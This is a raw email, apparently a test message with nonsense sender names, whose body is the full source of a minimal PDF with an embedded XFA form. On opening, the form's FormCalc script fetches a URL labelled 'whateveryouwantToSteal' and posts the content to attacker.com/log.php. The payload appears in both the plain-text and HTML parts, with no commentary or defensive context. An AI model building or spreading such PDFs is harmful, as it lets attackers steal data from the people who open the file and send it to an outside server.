MIME-Version: 1.0Received: by 10.28.182.11 with HTTP; Sun, 22 Apr 2018 16:15:5

1. MIME-Version: 1.0
2. Received: by 10.28.182.11 with HTTP; Sun, 22 Apr 2018 16:15:55 -0700 (PDT)
3. X-Originating-IP: [178.115.227.190]
4. Date: Mon, 23 Apr 2018 01:15:55 +0200
5. Delivered-To: missoum@missoumsai.us
6. Message-ID: <CAMob-0kdu-GTip_TFhkg-6Bz9n5xz9hFZvAA6OOFj_mZyNjoiQ@mail.gmail.com>
7. Subject: test
8. From: zezae eazaeeza <missoum@missoumsai.us>
9. To: ezaeza zezaeza <m@missoumsai.us>, missoumozil@gmail.com
10. Content-Type: multipart/alternative; boundary="001a11423f3865ef7d056a781a8d"
11.  
12. --001a11423f3865ef7d056a781a8d
13. Content-Type: text/plain; charset="UTF-8"
14.  
15. % a PDF file using an XFA
16. % most whitespace can be removed (truncated to 570 bytes or so...)
17. % Ange Albertini BSD Licence 2012
18. % modified by insertscript
19.  
20. %PDF-1. % can be truncated to %PDF-\0
21.  
22. 1 0 obj <<>>
23. stream
24. <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
25. <config><present><pdf>
26. <interactive>1</interactive>
27. </pdf></present></config>
28.  
29. <template>
30. <subform name="_">
31. <pageSet/>
32. <field id="Hello World!">
33. <event activity="initialize">
34. <script contentType='application/x-formcalc'>
35. var content =
36. GET("http://example.com/whateveryouwantToSteal")
37. POST("http://attacker.com/log.php",content)
38. </script>
39. </event>
40. </field>
41. </subform>
42. </template>
43. </xdp:xdp>
44. endstream
45. endobj
46.  
47. trailer <<
48. /Root <<
49. /AcroForm <<
50. /Fields [<<
51. /T (0)
52. /Kids [<<
53. /Subtype /Widget
54. /Rect []
55. /T ()
56. /FT /Btn
57. >>]
58. >>]
59. /XFA 1 0 R
60. >>
61. /Pages <<>>
62. >>
63. >>
64.  
65. --001a11423f3865ef7d056a781a8d
66. Content-Type: text/html; charset="UTF-8"
67. Content-Transfer-Encoding: quoted-printable
68.  
69. <div dir=3D"ltr"><pre style=3D"color:rgb(0,0,0);font-style:normal;font-vari=
70. ant-ligatures:normal;font-variant-caps:normal;font-weight:400;letter-spacin=
71. g:normal;text-align:start;text-indent:0px;text-transform:none;word-spacing:=
72. 0px;text-decoration-style:initial;text-decoration-color:initial;word-wrap:b=
73. reak-word;white-space:pre-wrap">% a PDF file using an XFA
74. % most whitespace can be removed (truncated to 570 bytes or so...)
75. % Ange Albertini BSD Licence 2012
76. % modified by insertscript
77.  
78. %PDF-1. % can be truncated to %PDF-\0
79.  
80. 1 0 obj &lt;&lt;&gt;&gt;
81. stream
82. &lt;xdp:xdp xmlns:xdp=3D&quot;<a href=3D"http://ns.adobe.com/xdp/">http://n=
83. s.adobe.com/xdp/</a>&quot;&gt;
84. &lt;config&gt;&lt;present&gt;&lt;pdf&gt;
85. &lt;interactive&gt;1&lt;/interactive&gt;
86. &lt;/pdf&gt;&lt;/present&gt;&lt;/config&gt;
87.  
88. &lt;template&gt;
89. &lt;subform name=3D&quot;_&quot;&gt;
90. &lt;pageSet/&gt;
91. &lt;field id=3D&quot;Hello World!&quot;&gt;
92. &lt;event activity=3D&quot;initialize&quot;&gt;
93. &lt;script contentType=3D&#39;application/x-formcalc&#39;&g=
94. t;
95. var content =3D GET(&quot;<a href=3D"http://example.com=
96. /whateveryouwantToSteal">http://example.com/whateveryouwantToSteal</a>&quot=
97. ;)
98. POST(&quot;<a href=3D"http://attacker.com/log.php">http=
99. ://attacker.com/log.php</a>&quot;,content)
100. &lt;/script&gt;
101. &lt;/event&gt;
102. &lt;/field&gt;
103. &lt;/subform&gt;
104. &lt;/template&gt;
105. &lt;/xdp:xdp&gt;
106. endstream
107. endobj
108.  
109. trailer &lt;&lt;
110. /Root &lt;&lt;
111. /AcroForm &lt;&lt;
112. /Fields [&lt;&lt;
113. /T (0)
114. /Kids [&lt;&lt;
115. /Subtype /Widget
116. /Rect []
117. /T ()
118. /FT /Btn
119. &gt;&gt;]
120. &gt;&gt;]
121. /XFA 1 0 R
122. &gt;&gt;
123. /Pages &lt;&lt;&gt;&gt;
124. &gt;&gt;
125. &gt;&gt;</pre><br></div>
126.  
127. --001a11423f3865ef7d056a781a8d--